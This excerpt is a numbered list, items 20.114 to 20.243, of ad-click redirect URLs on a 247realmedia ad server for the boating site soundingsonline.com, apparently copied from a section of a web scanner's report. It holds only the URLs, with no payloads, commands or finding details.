20.114. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.115. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.116. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.117. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.118. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.119. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.120. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.121. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.122. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.123. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.124. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.125. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.126. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.127. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.128. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.129. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.130. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.131. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.132. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.133. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.134. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.135. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.136. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.137. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.138. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.139. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.140. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.141. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.142. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.143. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.144. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.145. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.146. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.147. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.148. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.149. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.150. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.151. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.152. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.153. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.154. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.155. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.156. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.157. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.158. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

20.159. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.160. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.161. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.162. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.163. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.164. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.165. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.166. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.167. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.168. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.169. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.170. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.171. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.172. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.173. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.174. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.175. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.176. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.177. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.178. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.179. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.180. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.181. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.182. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.183. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.184. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

20.185. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.186. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.187. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.188. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.189. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.190. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.191. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.192. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.193. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.194. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.195. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.196. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.197. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.198. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.199. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.200. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.201. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.202. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.203. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.204. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.205. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.206. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.207. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.208. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.209. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.210. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.211. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.212. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.213. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.214. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.215. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.216. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.217. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.218. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.219. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.220. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.221. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.222. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.223. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.224. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.225. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.226. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.227. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.228. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.229. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.230. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.231. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.232. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.233. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.234. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.235. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.236. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.237. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.238. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.239. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

20.240. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.241. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.242. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.243. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

